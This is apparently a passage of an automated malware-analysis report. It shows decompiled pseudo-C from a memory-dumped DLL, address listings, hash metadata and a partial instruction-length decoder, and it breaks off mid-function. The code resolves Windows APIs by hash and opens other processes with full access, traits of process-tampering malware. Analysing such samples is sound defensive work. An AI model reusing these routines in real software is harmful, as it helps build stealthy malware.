				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6E8EB658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6E8EF4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6E8EF654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6E8F2234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6E8EF654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6E8EF584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6E8EF584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6E8EF4BC(_t449 + 0x14, 0);
									_t180 = E6E8F2908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6E8EB5C4(_t449 + 0x34);
										E6E8EB5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E8EF4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6E8EF4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6E8EB5C4(_t449 + 0x34);
										E6E8EB5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6E8ECA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6E8EC280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6E8EF828(_t449 + 0x14, E6E8EF4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6E8EF4BC(_t449 + 0x14, E6E8EF4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6E8F3064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6E8EF828(_t449 + 0x40, E6E8EF4CC(_t449 + 0x3c) + 4);
											 *(E6E8EF4BC(_t449 + 0x40, E6E8EF4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6E8ECD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6E8EF4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6E8EF4BC(_t449 + 0x40, _t431 * 4);
												E6E8E8B58( *_t211, E6E8F02B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6E8ECD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6E8EF4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6E8EF4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6E8EF4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6E8EF4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6E8EF4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6E8F38F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E8EF4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6E8EF828( *(_t449 + 4), E6E8EF4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6E8EF4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6E8EF4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6E8EF4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6E8EF4BC(_t322, _t430);
										E6E8F38F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E8EF4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6E8EF828(_t322, E6E8EF4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6E8EF828( *(_t449 + 4), E6E8EF4CC( *_t449) + 4);
								 *(E6E8EF4BC( *(_t449 + 4), E6E8EF4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6E8EF828(_t322, E6E8EF4CC(_t322) + 4);
								 *(E6E8EF4BC(_t322, E6E8EF4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6E8EF4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6E8F3064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E8EF4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6E8EF828( *(_t449 + 4), E6E8EF4CC( *_t449) + 4);
										 *(E6E8EF4BC( *(_t449 + 4), E6E8EF4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6E8EF4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6E8EF828( *((intOrPtr*)(_t449 + 0x74)), E6E8EF4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6E8EF4BC( *((intOrPtr*)(_t449 + 0x74)), E6E8EF4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6E8EF4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6E8EF4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6E8EF4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6E8EF4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6E8EF4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6E8EF4BC(_t430, _t443);
										E6E8F38F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E8EF4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6E8EF828(_t430, E6E8EF4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6E8F3064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6E8EF4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6E8EF4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6E8EF4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6E8EF4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6E8EF4BC( *(_t449 + 4), _t445);
										E6E8F38F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E8EF4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6E8EF828( *(_t449 + 4), E6E8EF4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6E8EF4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6e8e8435
0x6e8e843b
0x6e8e843f
0x6e8e8443
0x6e8e844e
0x6e8e8452
0x6e8e8457
0x6e8e845f
0x6e8e846f
0x00000000
0x6e8e8471
0x6e8e8479
0x6e8e8480
0x6e8e8480
0x6e8e89d3
0x6e8e89d5
0x6e8e8a16
0x6e8e8a18
0x6e8e8a27
0x6e8e8a33
0x6e8e8a33
0x6e8e8a22
0x6e8e8a39
0x6e8e8a3e
0x00000000
0x6e8e8a3e
0x6e8e8a26
0x00000000
0x6e8e848a
0x6e8e848e
0x6e8e8491
0x6e8e8599
0x6e8e8599
0x6e8e859e
0x6e8e86c1
0x6e8e86c5
0x6e8e86ca
0x6e8e86ce
0x6e8e86d2
0x6e8e8808
0x6e8e880a
0x6e8e880e
0x6e8e8817
0x6e8e8822
0x6e8e8826
0x6e8e882f
0x6e8e8834
0x6e8e883a
0x6e8e883b
0x6e8e883f
0x6e8e8843
0x6e8e884a
0x6e8e884c
0x6e8e898c
0x6e8e899d
0x6e8e89a4
0x6e8e89ab
0x6e8e89ab
0x6e8e89ae
0x6e8e89b1
0x6e8e89b4
0x6e8e89ba
0x6e8e89c1
0x6e8e89c5
0x6e8e89ce
0x00000000
0x6e8e89ce
0x6e8e89bc
0x6e8e89bf
0x6e8e89d8
0x6e8e89f0
0x6e8e89f3
0x6e8e89f8
0x6e8e8a02
0x6e8e8a05
0x6e8e8a08
0x6e8e8a11
0x00000000
0x6e8e8a11
0x00000000
0x6e8e89bf
0x6e8e8854
0x6e8e8854
0x6e8e8856
0x6e8e885a
0x6e8e885f
0x6e8e8861
0x6e8e8865
0x6e8e8868
0x6e8e8870
0x6e8e8872
0x00000000
0x00000000
0x6e8e8889
0x6e8e88a4
0x6e8e88a6
0x6e8e88b4
0x6e8e88b9
0x6e8e88bb
0x6e8e88d8
0x6e8e88d8
0x6e8e88dc
0x6e8e88de
0x00000000
0x00000000
0x6e8e88e0
0x6e8e88e3
0x6e8e8904
0x6e8e8923
0x6e8e8929
0x6e8e892c
0x6e8e8931
0x6e8e8932
0x6e8e8939
0x00000000
0x00000000
0x6e8e8941
0x6e8e8941
0x6e8e8943
0x6e8e894f
0x6e8e895b
0x6e8e897d
0x6e8e8982
0x6e8e8983
0x6e8e8983
0x00000000
0x6e8e8943
0x00000000
0x6e8e88e3
0x6e8e88bd
0x6e8e88c3
0x6e8e88c5
0x6e8e88c6
0x6e8e88c7
0x6e8e88c8
0x6e8e88cc
0x6e8e88d0
0x6e8e88d2
0x6e8e88d3
0x6e8e88d4
0x6e8e88d6
0x00000000
0x00000000
0x00000000
0x6e8e88d6
0x6e8e88e9
0x00000000
0x6e8e88e9
0x6e8e86d8
0x6e8e86da
0x6e8e86dc
0x00000000
0x00000000
0x6e8e86e6
0x6e8e86e6
0x6e8e86e8
0x6e8e86eb
0x6e8e86ed
0x6e8e86f5
0x6e8e86fc
0x6e8e8700
0x6e8e8703
0x00000000
0x00000000
0x6e8e87ff
0x6e8e8800
0x6e8e8802
0x00000000
0x00000000
0x00000000
0x6e8e8802
0x6e8e8709
0x6e8e870c
0x6e8e8715
0x6e8e871a
0x6e8e871c
0x6e8e8728
0x6e8e872c
0x6e8e8731
0x6e8e8735
0x6e8e8b12
0x6e8e8b26
0x6e8e8b48
0x6e8e8b4d
0x6e8e8b4d
0x6e8e874b
0x6e8e8750
0x6e8e8754
0x6e8e8754
0x6e8e8754
0x6e8e8754
0x6e8e8759
0x6e8e875e
0x6e8e8760
0x6e8e8764
0x6e8e876b
0x6e8e8770
0x6e8e8772
0x6e8e8ad3
0x6e8e8ae2
0x6e8e8afb
0x6e8e8b00
0x6e8e8b00
0x6e8e8785
0x6e8e878a
0x6e8e878e
0x6e8e878e
0x6e8e878e
0x6e8e87a0
0x6e8e87c1
0x6e8e87c9
0x6e8e87d7
0x6e8e87f5
0x6e8e87fb
0x6e8e87fb
0x00000000
0x6e8e870c
0x6e8e85a4
0x6e8e85a4
0x6e8e85a6
0x6e8e85ad
0x6e8e85bb
0x6e8e85bd
0x6e8e85c1
0x6e8e85c3
0x6e8e85c5
0x6e8e8600
0x6e8e860f
0x6e8e8611
0x6e8e8613
0x6e8e8631
0x6e8e8633
0x6e8e8635
0x6e8e8647
0x6e8e8665
0x6e8e866e
0x6e8e8671
0x6e8e867f
0x6e8e8690
0x6e8e86ae
0x6e8e86b0
0x6e8e86b4
0x6e8e86b4
0x6e8e86b4
0x6e8e8635
0x00000000
0x6e8e8613
0x6e8e85cb
0x6e8e85cb
0x6e8e85d0
0x6e8e85d7
0x6e8e85e6
0x6e8e85ed
0x6e8e85ef
0x00000000
0x00000000
0x6e8e85fb
0x6e8e85fc
0x6e8e85fe
0x00000000
0x00000000
0x00000000
0x6e8e85fe
0x6e8e85f1
0x6e8e85f4
0x00000000
0x00000000
0x6e8e86b6
0x6e8e86b6
0x6e8e86b7
0x6e8e86b7
0x00000000
0x6e8e8497
0x6e8e8497
0x6e8e8497
0x6e8e8499
0x6e8e84a0
0x6e8e84ae
0x6e8e84b0
0x6e8e84b4
0x6e8e84b6
0x6e8e84e2
0x6e8e84e6
0x6e8e84eb
0x6e8e84f0
0x6e8e84f4
0x6e8e84f8
0x6e8e84ff
0x6e8e8504
0x6e8e8506
0x6e8e8a95
0x6e8e8aa4
0x6e8e8ac3
0x6e8e8ac8
0x6e8e8ac8
0x6e8e8519
0x6e8e851e
0x6e8e8522
0x6e8e8522
0x6e8e8522
0x6e8e8533
0x6e8e8535
0x6e8e8537
0x6e8e8548
0x6e8e8548
0x6e8e854d
0x6e8e8552
0x6e8e8556
0x6e8e855b
0x6e8e8562
0x6e8e8567
0x6e8e8569
0x6e8e8a57
0x6e8e8a63
0x6e8e8a7d
0x6e8e8a82
0x6e8e8a82
0x6e8e857f
0x6e8e8584
0x6e8e8588
0x6e8e8588
0x6e8e8588
0x6e8e8588
0x6e8e858b
0x6e8e858b
0x00000000
0x6e8e858b
0x6e8e84ba
0x6e8e84ba
0x6e8e84bc
0x6e8e84c8
0x6e8e84cf
0x6e8e84d1
0x00000000
0x00000000
0x6e8e84dd
0x6e8e84de
0x6e8e84e0
0x00000000
0x00000000
0x00000000
0x6e8e84e0
0x6e8e84d3
0x6e8e84d6
0x00000000
0x00000000
0x6e8e858c
0x6e8e8590
0x6e8e8591
0x6e8e8591
0x00000000
0x6e8e8499
0x6e8e8491

Strings

, xrefs: 6E8E8A1A

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction ID: d95ae3c08140fbf73077e7b8fbfea6e7501ba2fe9bf7182e26d3796f7b1b5b5e
Opcode Fuzzy Hash: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction Fuzzy Hash: DE12C0712083059FD724DFA8D980EAEB7E9EF96308F144D2DE599976A1EB30DC05CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F9370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E8F9370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6E8F3698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
